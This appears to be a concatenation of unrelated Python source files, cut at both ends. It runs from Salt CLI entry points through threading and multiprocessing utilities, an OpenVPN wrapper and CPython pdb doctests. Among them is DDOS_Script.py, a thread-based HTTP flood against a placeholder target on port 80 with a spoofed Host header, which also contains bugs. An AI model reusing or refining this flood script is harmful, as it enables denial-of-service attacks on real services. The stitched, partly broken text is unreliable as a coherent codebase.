sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
'''
Quickstart for developing on the saltstack installation
.. versionadded:: Carbon
'''
import salt.utils.extend
salt.utils.extend.run(extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge)
|
test_game_play.py
|
import queue
import threading
import time
import unittest
from datetime import datetime
from battleships_pb2 import Attack, Request, Status
from server import Battleship
REDIS_HOST = 'localhost'
def stream(q, p):
while True:
s = q.get()
if s is not None:
print(f'{datetime.now()} - {p} - Sending -', s, flush=True)
yield s
else:
return
def read_incoming(input_stream, s):
while True:
try:
response = next(input_stream)
print(f'{datetime.now()} - {s} - Received -', response, flush=True)
except StopIteration:
return
def attack(vector):
return Request(move=Attack(vector=vector))
def report(state):
return Request(report=Status(state=state))
def start_thread(_stream, name):
t = threading.Thread(target=lambda: read_incoming(_stream, name))
t.daemon = True
t.start()
def test_simple_game_play():
delay = 0.5
player_1 = 'Alice'
player_2 = 'Bob'
alice = queue.Queue()
bob = queue.Queue()
game_server_1 = Battleship(REDIS_HOST)
game_server_2 = Battleship(REDIS_HOST)
input_stream_1 = game_server_1.Game(stream(alice, player_1), {})
input_stream_2 = game_server_2.Game(stream(bob, player_2), {})
start_thread(input_stream_1, player_1)
start_thread(input_stream_2, player_2)
# Both players join
alice.put(Request(join=Request.Player(id=player_1)))
time.sleep(delay)
bob.put(Request(join=Request.Player(id=player_2)))
time.sleep(delay)
# Player 1 gets to start
alice.put(attack("a1"))
bob.put(report(Status.State.MISS))
time.sleep(delay)
# Now it is Player 2's turn
bob.put(attack("j10"))
alice.put(report(Status.State.HIT))
time.sleep(delay)
# Now it is Player 1's turn
alice.put(attack("c5"))
bob.put(report(Status.State.MISS))
time.sleep(delay)
# Now it is Player 2's turn
bob.put(attack("e3"))
alice.put(report(Status.State.DEFEAT))
time.sleep(delay)
alice.put(None)
bob.put(None)
time.sleep(1)
# class TestGamePlay(unittest.TestCase):
# def test_simple_game_play(self):
# test_simple_game_play()
if __name__ == '__main__':
test_simple_game_play()
|
DDOS_Script.py
|
"""
This is not an actual DDOS attack script
It's just a basic script to understand the fundamentals of DDOS attack.
This is nowhere near powerful enough,
Firstly because this is too slow -
CPython threads are real OS threads, but the GIL lets only one of them
run Python bytecode at a time, so threading gains little raw throughput here.
And this script's got a LOT of security loopholes...
Even if you manage to write a solid script from this,
DDOS-ing IPs is a serious crime.
You're on your own. I am not responsible for any malpractice...
"""
import threading
import socket
target = '<target ip address/domain name>'
"""
Depending on the particular service you're trying to disrupt
you must select a different port...
For example,
Port 20 -- File transfer protocol Data Transfer
Port 21 -- File Transfer protocol Command control
Port 22 -- Secure Shell (SSH)
Port 23 -- Telnet - Remote Login Service
Port 25 -- Simple Mail Transfer Protocol (SMTP) E-mail routing
Port 53 -- Domain Name System (DNS) service
Port 80 -- Hypertext Transfer Protocol (HTTP) used in World Wide Web
Port 143 -- Internet Message Access Protocol (IMAP)
Port 443 -- HTTP Secure (HTTPS) HTTP over TLS/SSL
This script however, only aims to disrupt the HTTP services
of a particular IP so we will use Port 80
"""
port = 80
# Just specifying a fake ip in case someone comes snooping around...
fake_ip = '182.21.20.32'
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /"+ target +"HTTP/1.1\r\n").encode(ascii), (target, port))
s.sendto(("Host: "+ fake_ip +"\r\n\r\n").encode(ascii), (target, port))
s.close()
# Now running this function in multiple threads
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
|
thread.py
|
import cv2, threading, queue, time
class ThreadingClass:
# initiate threading class
def __init__(self, name):
time.sleep(1)
self.cap = cv2.VideoCapture(name)
# define an empty queue and thread
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read the frames as soon as they are available, discard any unprocessed frames;
# this approach removes OpenCV's internal buffer and reduces the frame lag
def _reader(self):
while True:
(ret, frame) = self.cap.read() # read the frames and ---
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait()
except queue.Empty:
pass
self.q.put(frame) # --- store them in a queue (instead of the buffer)
def read(self):
return self.q.get() # fetch frames from the queue one by one
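# Minimal usage sketch (assumption: device index 0 is a reachable webcam; a file path or
# RTSP URL would work the same way). read() always returns the newest frame because the
# reader thread above discards any frames that were not processed in time.
if __name__ == '__main__':
    cap = ThreadingClass(0)
    while True:
        frame = cap.read()
        cv2.imshow('frame', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    cv2.destroyAllWindows()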
|
vec_env.py
|
# Copyright (c) 2017 OpenAI (http://openai.com)
import numpy as np
from multiprocessing import Process, Pipe
from abc import ABC, abstractmethod
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
    each observation becomes a batch of observations, and each expected action is a batch of actions to
    be applied per-environment.
"""
closed = False
viewer = None
metadata = {
'render.modes': ['human', 'rgb_array']
}
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
"""
    VecEnv that runs multiple environments in parallel in subprocesses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, env_fn))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
self.specs = [f().spec for f in env_fns]
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
return _flatten_obs([remote.recv() for remote in self.remotes])
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def _flatten_obs(obs):
assert isinstance(obs, list) or isinstance(obs, tuple)
assert len(obs) > 0
if isinstance(obs[0], dict):
import collections
assert isinstance(obs, collections.OrderedDict)
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
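# Minimal usage sketch (assumption: gym is installed and 'CartPole-v1' is registered).
# Each environment runs in its own subprocess; actions and observations move in batches.
if __name__ == '__main__':
    import gym
    def make_env():
        return gym.make('CartPole-v1')
    venv = SubprocVecEnv([make_env for _ in range(4)])
    obs = venv.reset()                                    # batched observations, one row per env
    for _ in range(10):
        actions = [venv.action_space.sample() for _ in range(venv.num_envs)]
        obs, rews, dones, infos = venv.step(actions)      # step() = step_async() + step_wait()
    venv.close()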
|
initialize.py
|
__author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '8/4/2020 11:27 AM'
import multiprocessing
import os
def foo(index):
print("这里是 ", multiprocessing.current_process().name)
print('模块名称:', __name__)
print('父进程 id:', os.getppid()) # 获取父进程id
print('当前子进程 id:', os.getpid()) # 获取自己的进程id
print('------------------------')
if __name__ == '__main__':
for i in range(5):
p = multiprocessing.Process(target=foo, args=(i,))
p.start()
|
openvpn.py
|
#!/usr/bin/python
# openvpn.py: library to handle starting and stopping openvpn instances
import logging
import os
import signal
import subprocess
import threading
import time
class VPNConnectionError(Exception):
def __init__(self, value, log):
self.value = value
self.log = log
def __str__(self):
return repr(self.value)
class OpenVPN:
connected_instances = []
def __init__(self, config_file=None, auth_file=None, crt_file=None,
tls_auth=None, key_direction=None, timeout=60):
self.started = False
self.stopped = False
self.error = False
self.notifications = ""
self.auth_file = auth_file
self.crt_file = crt_file
self.tls_auth = tls_auth
self.key_dir = key_direction
self.config_file = config_file
self.thread = threading.Thread(target=self._invoke_openvpn)
self.thread.setDaemon(1)
self.timeout = timeout
def _invoke_openvpn(self):
cmd = ['sudo', 'openvpn', '--script-security', '2']
# --config must be the first parameter, since otherwise
# other specified options might not be able to overwrite
# the wrong, relative-path options in config file
if self.config_file is not None:
cmd.extend(['--config', self.config_file])
if self.crt_file is not None:
cmd.extend(['--ca', self.crt_file])
if self.tls_auth is not None and self.key_dir is not None:
cmd.extend(['--tls-auth', self.tls_auth, self.key_dir])
if self.auth_file is not None:
cmd.extend(['--auth-user-pass', self.auth_file])
self.process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
preexec_fn=os.setsid)
self.kill_switch = self.process.terminate
self.starting = True
while True:
line = self.process.stdout.readline().strip()
if not line:
break
self.output_callback(line, self.process.terminate)
def output_callback(self, line, kill_switch):
"""Set status of openvpn according to what we process"""
self.notifications += line + "\n"
if "Initialization Sequence Completed" in line:
self.started = True
if "ERROR:" in line or "Cannot resolve host address:" in line:
self.error = True
if "process exiting" in line:
self.stopped = True
def start(self, timeout=None):
"""
Start OpenVPN and block until the connection is opened or there is
an error
:param timeout: time in seconds to wait for process to start
:return:
"""
if not timeout:
timeout = self.timeout
self.thread.start()
start_time = time.time()
while start_time + timeout > time.time():
self.thread.join(1)
if self.error or self.started:
break
if self.started:
logging.info("OpenVPN connected")
# append instance to connected list
OpenVPN.connected_instances.append(self)
else:
logging.warn('OpenVPN not started')
log_lines = self.notifications.split('\n')
for line in log_lines:
logging.warn("OpenVPN output:\t\t%s" % line)
raise VPNConnectionError("OpenVPN not started", log_lines)
def stop(self, timeout=None):
"""
Stop OpenVPN process group
:param timeout: time in seconds to wait for process to stop
:return:
"""
if not timeout:
timeout = self.timeout
process_group_id = os.getpgid(self.process.pid)
try:
os.killpg(process_group_id, signal.SIGTERM)
except OSError:
# Because sometimes we have to sudo to send the signal
cmd = ['sudo', 'kill', '-' + str(process_group_id)]
process = subprocess.call(cmd)
self.thread.join(timeout)
if self.stopped:
logging.info("OpenVPN stopped")
if self in OpenVPN.connected_instances:
OpenVPN.connected_instances.remove(self)
else:
logging.error("Cannot stop OpenVPN!")
for line in self.notifications.split('\n'):
logging.warn("OpenVPN output:\t\t%s" % line)
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
    ...     'source fooxxx',        # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
import pdb
getattr(pdb.Pdb(nosigint=True), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
